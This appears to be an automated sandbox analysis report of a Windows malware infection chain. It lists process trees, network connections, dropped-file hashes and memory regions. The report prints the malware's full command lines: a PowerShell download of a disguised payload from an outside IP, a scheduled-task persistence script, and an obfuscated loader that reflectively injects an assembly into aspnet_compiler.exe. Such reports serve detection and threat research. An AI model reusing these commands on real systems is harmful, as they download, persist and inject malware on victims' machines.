PID 2324 wrote to memory of 3628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 2324 wrote to memory of 3628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 3628 wrote to memory of 1292 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3628 wrote to memory of 1292 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1292 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1292 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1292 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1292 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4592 wrote to memory of 4408 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4592 wrote to memory of 4408 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 3668 wrote to memory of 468 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 3668 wrote to memory of 468 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4408 wrote to memory of 2744 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 4408 wrote to memory of 2744 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2744 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5068 wrote to memory of 1612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4316 wrote to memory of 1772 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4316 wrote to memory of 1772 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 1772 wrote to memory of 2128 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 1772 wrote to memory of 2128 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 1448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 1448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1448 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 2660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1448 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\install.js

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 104.243.44.136:777 104.243.44.136 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 136.44.243.104.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 w3llsfarg0h0st.ddns.net udp
US 104.243.37.196:2244 w3llsfarg0h0st.ddns.net tcp
US 8.8.8.8:53 196.37.243.104.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/1120-0-0x00000207BC320000-0x00000207BC342000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elsa5muu.rlm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1120-10-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/1120-11-0x00000207D4920000-0x00000207D4930000-memory.dmp

memory/1120-12-0x00000207D48E0000-0x00000207D4906000-memory.dmp

memory/1120-13-0x00000207D5640000-0x00000207D5654000-memory.dmp

memory/1120-14-0x00000207D4920000-0x00000207D4930000-memory.dmp

memory/1120-15-0x00000207D56D0000-0x00000207D56E2000-memory.dmp

memory/1120-16-0x00000207D56A0000-0x00000207D56AA000-memory.dmp

memory/1120-47-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

C:\Users\Public\basta.js

MD5 38affda935585ad2ddc0abe0a906f404
SHA1 8379070ec3e9b448499c53c6244c815bc566cf59
SHA256 f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa
SHA512 0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

C:\Users\Public\node.bat

MD5 f6a91f8aa7612ef8d9f2887fd909600a
SHA1 948ac8197a43a5e50ed34241f3d74bba0222b9c7
SHA256 dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3
SHA512 666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 e5ab5d093e49058a43f45f317b401e68
SHA1 120da069a87aa9507d2b66c07e368753d3061c2d
SHA256 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
SHA512 d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

memory/3044-51-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/3044-52-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

memory/3044-53-0x000001BA7F060000-0x000001BA7F070000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9431378551c6d63789f4bc499aef072
SHA1 70455c2f065fc4475f1e620defa3c60ed0444399
SHA256 820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452
SHA512 1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15

memory/3044-64-0x000001BA7FDC0000-0x000001BA7FDE6000-memory.dmp

memory/3044-65-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/3652-66-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/3652-67-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

memory/3652-77-0x0000018F7C140000-0x0000018F7C150000-memory.dmp

memory/3652-79-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

C:\Users\Public\shell.js

MD5 3c93270c5a82e51379c4eaa91cd697d5
SHA1 250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7
SHA256 825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c
SHA512 ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f

C:\Users\Public\app.js

MD5 08a7e6db996774b6806c395c04116803
SHA1 d0182c34dacc8ab9c8841c8913a1ae7f4d281595
SHA256 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc
SHA512 d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b

C:\Users\Public\run.js

MD5 166e57b73fd399b0f54c415d22b235f6
SHA1 f20bf715826dc97a5e26c7acc4310d32213cc2b7
SHA256 f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3
SHA512 e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

memory/5068-85-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/5068-86-0x0000022869390000-0x00000228693A0000-memory.dmp

memory/5068-92-0x0000022869390000-0x00000228693A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d5dc472de2b37146b21b63a3173176d
SHA1 7d3dd1e9a91c497745e965b4fdbbeac28196ab45
SHA256 75edb4ad9fc3331ff2d78383ae18095cb8163bdffaaa64e6593283bb7a17c3bb
SHA512 74bf3f56b6a31fb8745c27dd8a32a97c3923d08e76fb267ebf73bb9e7e901070ee2695437af17c4b4fad583a7591c454bd8cfd0fd7ef9e7b2691d1487f0cb1bb

C:\Users\Public\msg.dll

MD5 55a2ab1987b5dc68a293d870ff989008
SHA1 e170596b7a86e216f23f9e0187e460447f63a88f
SHA256 c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64
SHA512 ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4

C:\Users\Public\runpe.dll

MD5 ab3151ce426cf5959813a90f452750b8
SHA1 271198005f634f22c0f84358a00b7aff302e712b
SHA256 a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578
SHA512 5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b

C:\Users\Public\xx.dll

MD5 14c2a6b7bf15e15d8dae9cd4a56432d5
SHA1 0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016
SHA256 79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96
SHA512 e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

C:\Users\Public\type.dll

MD5 be784e48d0174367297b636456c7bcf1
SHA1 8c906d9e0e2439238b3263e087aee3d98fa86dea
SHA256 510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136
SHA512 aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

C:\Users\Public\load.dll

MD5 f19dbf2edb3a0bd74b0524d960ff21eb
SHA1 ddcb77ff769ea54ca622848f6bedd4004fa4f4fa
SHA256 8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3
SHA512 f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

C:\Users\Public\method.dll

MD5 38b97710070dbdd7b3359c0d52da4a72
SHA1 4ce08d2147c514f9c8e1f83d384369ec8986bc3b
SHA256 675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7
SHA512 b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

C:\Users\Public\Framework.dll

MD5 6a08392ecf95df7fc91917dcfaae8da6
SHA1 480f6a5c761e1a069c0d68f5ac2aabf727791393
SHA256 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460
SHA512 d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

C:\Users\Public\invoke.dll

MD5 b9376e9e3c4d48f5e35a3f355ae1f74a
SHA1 c65605adf5270f5065089b0189da542274d30db0
SHA256 90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9
SHA512 5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

C:\Users\Public\Execute.dll

MD5 529cf04db0f736467c7583ea80c3aa66
SHA1 7628148337b1d3d700c8151f76a1595b6f5123b8
SHA256 67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520
SHA512 f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

memory/5068-107-0x000002286BC50000-0x000002286BCA2000-memory.dmp

memory/5068-108-0x0000022869390000-0x00000228693A0000-memory.dmp

memory/5068-109-0x0000022869390000-0x00000228693A0000-memory.dmp

memory/1612-110-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5068-112-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/1612-113-0x00000000753C0000-0x0000000075B70000-memory.dmp

memory/1612-114-0x0000000004D80000-0x0000000004D90000-memory.dmp

memory/1612-115-0x0000000005540000-0x0000000005AE4000-memory.dmp

memory/1612-116-0x0000000005170000-0x0000000005202000-memory.dmp

memory/1612-117-0x0000000005150000-0x000000000515A000-memory.dmp

memory/1612-120-0x0000000006370000-0x000000000640C000-memory.dmp

memory/1612-121-0x0000000005E60000-0x0000000005EC6000-memory.dmp

memory/1612-122-0x00000000753C0000-0x0000000075B70000-memory.dmp

memory/1612-123-0x0000000004D80000-0x0000000004D90000-memory.dmp

memory/1448-124-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/1448-125-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

memory/1448-126-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a3a11baeb69c919d9e6a93ff4353155
SHA1 d926b5b919307fb37e39b94550c98922533e23e5
SHA256 052ccf5c0687f85f7eb792a6425134ca99308252992cb59862bc063d100bac9c
SHA512 c6f857e401490c2bbe5e6493e4834b89fa5b73909bf51c2c5aee8b26a456834cac32fe93a669646a8538cb1290673e875dfc2154bcf3a99117ef6bc6bfe3dda9

memory/1448-137-0x000001BE69BA0000-0x000001BE69BF2000-memory.dmp

memory/1448-138-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

memory/1448-139-0x000001BE691A0000-0x000001BE691B0000-memory.dmp

memory/880-141-0x00000000753C0000-0x0000000075B70000-memory.dmp

memory/1448-144-0x00007FFD05130000-0x00007FFD05BF1000-memory.dmp

memory/880-145-0x0000000005640000-0x0000000005650000-memory.dmp

memory/880-147-0x00000000753C0000-0x0000000075B70000-memory.dmp